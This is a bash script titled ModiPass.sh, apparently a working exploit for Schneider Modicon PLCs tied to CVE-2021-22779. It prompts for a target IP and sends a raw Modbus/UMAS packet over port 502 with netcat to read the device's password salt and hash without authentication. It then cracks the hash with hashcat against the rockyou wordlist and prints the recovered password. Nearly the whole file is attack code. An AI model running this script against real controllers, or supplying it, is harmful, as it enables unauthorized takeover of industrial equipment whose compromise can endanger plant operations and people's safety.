ModiPass.sh

#!/usr/bin/env bash

# sudo apt install hashcat

echo -e "\033[32m"
echo '
                  _ _   ___              
  /\/\   ___   __| (_) / _ \__ _ ___ ___ 
 /    \ / _ \ / _` | |/ /_)/ _` / __/ __|
/ /\/\ \ (_) | (_| | / ___/ (_| \__ \__ \
\/    \/\___/ \__,_|_\/    \__,_|___/___/

     Schneider Modicon PLC exploit
     hash dump and password crack
        partial CVE-2021-22779
'
echo -e "\033[0m"

echo 'ENTER IP :'
read IP

PORT=502
# default modbus/umas port
FILE=modicon.hash
# file to store hash and salt
DICTIONARY=/usr/share/wordlists/rockyou.txt
# your prefered password dictionary
TIMEOUT=10

DUMP=$(echo -ne '\x00\x00\x00\x00\x00\x0d\x0b\x5a\x00\x20\x00\x14\x00\x00\x00\x00\x00\x00\x02' | nc -w $TIMEOUT $IP $PORT | strings | tr '\t' ' ' | tr '\n' ' ')
#DUMP=$(echo -ne '\x00\x00\x00\x00\x00\x0d\x0b\x5a\x00\x20\x01\x14\x00\x00\x00\x00\x00\x00\x02' | nc $IP $PORT | strings)
# modbus encapsulated umas 512 bytes memory block 20 read function without authentification

SALT=$(echo "$DUMP" | cut -d ' ' -f 2)
HASH=$(echo "$DUMP" | cut -d ' ' -f 3)
echo "$SALT" | base64 -d &>/dev/null
check=$?
if [[ $check -ne 0 ]]
then
        SALT=$(echo "$DUMP" | cut -d ' ' -f 3)
        HASH=$(echo "$DUMP" | cut -d ' ' -f 4)
fi

SALT=$(echo "$SALT" | base64 -d | xxd -p)
HASH=$(echo "$HASH" | base64 -d | xxd -p | tr -d '\n')

echo "SALT : $SALT"
echo "HASH : $HASH"

echo -n "$HASH:" > $FILE
echo "$SALT" >> $FILE

hashcat -m 1440 --hex-salt $FILE $DICTIONARY &>/dev/null
PASS=$(hashcat -m 1440 --hex-salt $FILE --show | cut -d ':' -f 3)
echo "PASS : $PASS"